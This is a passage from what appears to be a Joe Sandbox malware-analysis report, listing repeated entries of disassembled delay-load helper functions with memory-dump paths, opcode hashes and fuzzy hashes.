                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 3d783d158ae1730e82c01f0a1f4948d47e36cbe90f91269c1e197a2a511f484d
                                                                                              • Instruction ID: bb0ffb1d7fdb578cd430d76eee1ea53a9cd61bb0ce407f1a409bdfdf4ea730d5
                                                                                              • Opcode Fuzzy Hash: 3d783d158ae1730e82c01f0a1f4948d47e36cbe90f91269c1e197a2a511f484d
                                                                                              • Instruction Fuzzy Hash: 6BA001E72AD142BD7A08A2566D4BD3B021DC5C9B65371C9BEF82AC54C2A89068456872
                                                                                              Function 00C7E25F Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00C7E1E3
                                                                                                • Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
                                                                                                • Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: e546798748308b9535a081a31b1271dc97298514e15c2f671b849b0a36e8832d
                                                                                              • Instruction ID: bb0ffb1d7fdb578cd430d76eee1ea53a9cd61bb0ce407f1a409bdfdf4ea730d5
                                                                                              • Opcode Fuzzy Hash: e546798748308b9535a081a31b1271dc97298514e15c2f671b849b0a36e8832d
                                                                                              • Instruction Fuzzy Hash: 6BA001E72AD142BD7A08A2566D4BD3B021DC5C9B65371C9BEF82AC54C2A89068456872
                                                                                              Function 00C7E27D Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00C7E1E3
                                                                                                • Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
                                                                                                • Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 44d4a5d64e76f179a414342cf49bbc3504e28cf7828b638ae959216e4989279c
                                                                                              • Instruction ID: bb0ffb1d7fdb578cd430d76eee1ea53a9cd61bb0ce407f1a409bdfdf4ea730d5
                                                                                              • Opcode Fuzzy Hash: 44d4a5d64e76f179a414342cf49bbc3504e28cf7828b638ae959216e4989279c
                                                                                              • Instruction Fuzzy Hash: 6BA001E72AD142BD7A08A2566D4BD3B021DC5C9B65371C9BEF82AC54C2A89068456872
                                                                                              Function 00C7E219 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00C7E1E3
                                                                                                • Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
                                                                                                • Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: f3652957565e546442cce9b50d4aa2c6e5898cfa1e80c320e904ec4b93db90c1
                                                                                              • Instruction ID: bb0ffb1d7fdb578cd430d76eee1ea53a9cd61bb0ce407f1a409bdfdf4ea730d5
                                                                                              • Opcode Fuzzy Hash: f3652957565e546442cce9b50d4aa2c6e5898cfa1e80c320e904ec4b93db90c1
                                                                                              • Instruction Fuzzy Hash: 6BA001E72AD142BD7A08A2566D4BD3B021DC5C9B65371C9BEF82AC54C2A89068456872
                                                                                              Function 00C7E3EF Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00C7E3FC
                                                                                                • Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
                                                                                                • Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 0e173c9cbfc6cb4b87da0bc852cc6eb429ff4d2ec3821dd0cfb14005c9b34b5d
                                                                                              • Instruction ID: 3b24b2c6d6bb41feb24824dd3429ed99272e4d1e365d3c0042d494a8afd17f14
                                                                                              • Opcode Fuzzy Hash: 0e173c9cbfc6cb4b87da0bc852cc6eb429ff4d2ec3821dd0cfb14005c9b34b5d
                                                                                              • Instruction Fuzzy Hash: EEA001E72A9152BD3608A2566D4AD3B022DC5C9B29330D5AEF829A54D1AC8018456873
                                                                                              Function 00C7E446 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00C7E3FC
                                                                                                • Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
                                                                                                • Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 78f2fd04240114c1ba60bdb51211905b2e105a8ea719780485c85d8afa624444
                                                                                              • Instruction ID: 6f7d1bd0098ebe20b275e93ab869be723f7cd3ed87eeafd98d528a97047263a3
                                                                                              • Opcode Fuzzy Hash: 78f2fd04240114c1ba60bdb51211905b2e105a8ea719780485c85d8afa624444
                                                                                              • Instruction Fuzzy Hash: 05A001E72A9152BC3608A2566D4AD3B022DC5C9B65330D9AEF82A954D1A88018456873
                                                                                              Function 00C7E40A Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00C7E3FC
                                                                                                • Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
                                                                                                • Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 317f630a4c79e5bf715688f270eb9e86f74a1027153d19762bac3b9d0f6c659b
                                                                                              • Instruction ID: 6f7d1bd0098ebe20b275e93ab869be723f7cd3ed87eeafd98d528a97047263a3
                                                                                              • Opcode Fuzzy Hash: 317f630a4c79e5bf715688f270eb9e86f74a1027153d19762bac3b9d0f6c659b
                                                                                              • Instruction Fuzzy Hash: 05A001E72A9152BC3608A2566D4AD3B022DC5C9B65330D9AEF82A954D1A88018456873
                                                                                              Function 00C7E414 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00C7E3FC
                                                                                                • Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
                                                                                                • Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 646a9370251087b1ed7f626e9261d7c24ca6d56b60effba9a79bf8c615012bda
                                                                                              • Instruction ID: 6f7d1bd0098ebe20b275e93ab869be723f7cd3ed87eeafd98d528a97047263a3
                                                                                              • Opcode Fuzzy Hash: 646a9370251087b1ed7f626e9261d7c24ca6d56b60effba9a79bf8c615012bda
                                                                                              • Instruction Fuzzy Hash: 05A001E72A9152BC3608A2566D4AD3B022DC5C9B65330D9AEF82A954D1A88018456873
                                                                                              Function 00C7E432 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00C7E3FC
                                                                                                • Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
                                                                                                • Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: d82f44f8b9ecbdafaebfd4b82e6fac3e39b2cf325ddbef64b4e4ec6b55a2b60f
                                                                                              • Instruction ID: 6f7d1bd0098ebe20b275e93ab869be723f7cd3ed87eeafd98d528a97047263a3
                                                                                              • Opcode Fuzzy Hash: d82f44f8b9ecbdafaebfd4b82e6fac3e39b2cf325ddbef64b4e4ec6b55a2b60f
                                                                                              • Instruction Fuzzy Hash: 05A001E72A9152BC3608A2566D4AD3B022DC5C9B65330D9AEF82A954D1A88018456873
                                                                                              Function 00C7E43C Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00C7E3FC
                                                                                                • Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
                                                                                                • Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 2e25a3392c69e8bc61653eaa6b89af1c02ce1f45747d5386fe00dc294eb9ffc8
                                                                                              • Instruction ID: 6f7d1bd0098ebe20b275e93ab869be723f7cd3ed87eeafd98d528a97047263a3
                                                                                              • Opcode Fuzzy Hash: 2e25a3392c69e8bc61653eaa6b89af1c02ce1f45747d5386fe00dc294eb9ffc8
                                                                                              • Instruction Fuzzy Hash: 05A001E72A9152BC3608A2566D4AD3B022DC5C9B65330D9AEF82A954D1A88018456873
                                                                                              Function 00C7E58E Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00C7E580
                                                                                                • Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
                                                                                                • Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 5730df007c2c183f02b6f777bf6cb0c001c83241399e38c7a7374778e5858b67
                                                                                              • Instruction ID: 6a0bc248b79f5543340d1872b4ce8cf3aca45d4e6fbbb564b8d88f22e1ec1475
                                                                                              • Opcode Fuzzy Hash: 5730df007c2c183f02b6f777bf6cb0c001c83241399e38c7a7374778e5858b67
                                                                                              • Instruction Fuzzy Hash: 6EA011C32A8002BC3208A2A22C8AC3B022CC0C8B28330C8AEF82A880C0A88008002832
                                                                                              Function 00C7E5A2 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00C7E580
                                                                                                • Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
                                                                                                • Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: dff0a8db4d761a36e3b2254c55dd66b282db0c3780a11986cdb8073d0350dae8
                                                                                              • Instruction ID: 6a0bc248b79f5543340d1872b4ce8cf3aca45d4e6fbbb564b8d88f22e1ec1475
                                                                                              • Opcode Fuzzy Hash: dff0a8db4d761a36e3b2254c55dd66b282db0c3780a11986cdb8073d0350dae8
                                                                                              • Instruction Fuzzy Hash: 6EA011C32A8002BC3208A2A22C8AC3B022CC0C8B28330C8AEF82A880C0A88008002832
                                                                                              Function 00C7E541 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00C7E51F
                                                                                                • Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
                                                                                                • Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: bdf4fae72d6a19e983441ed465561ddad0a4f24b474a0def6b870547b717e89f
                                                                                              • Instruction ID: 045121a7a56836dac3fcbb0ac14dfeb659dda09e637b7068a848da2a21483c0b
                                                                                              • Opcode Fuzzy Hash: bdf4fae72d6a19e983441ed465561ddad0a4f24b474a0def6b870547b717e89f
                                                                                              • Instruction Fuzzy Hash: D5A011C32A8002BC3208220A2E0AC3B022CC0CAFA8330C8AEF82A800C0A8800C002832
                                                                                              Function 00C7E555 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00C7E51F
                                                                                                • Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
                                                                                                • Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 7639a3b67a2e14e829b28192ef36698efe67f06a497fcdfc40490603dfaee536
                                                                                              • Instruction ID: 045121a7a56836dac3fcbb0ac14dfeb659dda09e637b7068a848da2a21483c0b
                                                                                              • Opcode Fuzzy Hash: 7639a3b67a2e14e829b28192ef36698efe67f06a497fcdfc40490603dfaee536
                                                                                              • Instruction Fuzzy Hash: D5A011C32A8002BC3208220A2E0AC3B022CC0CAFA8330C8AEF82A800C0A8800C002832
                                                                                              Function 00C7E55F Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00C7E51F
                                                                                                • Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
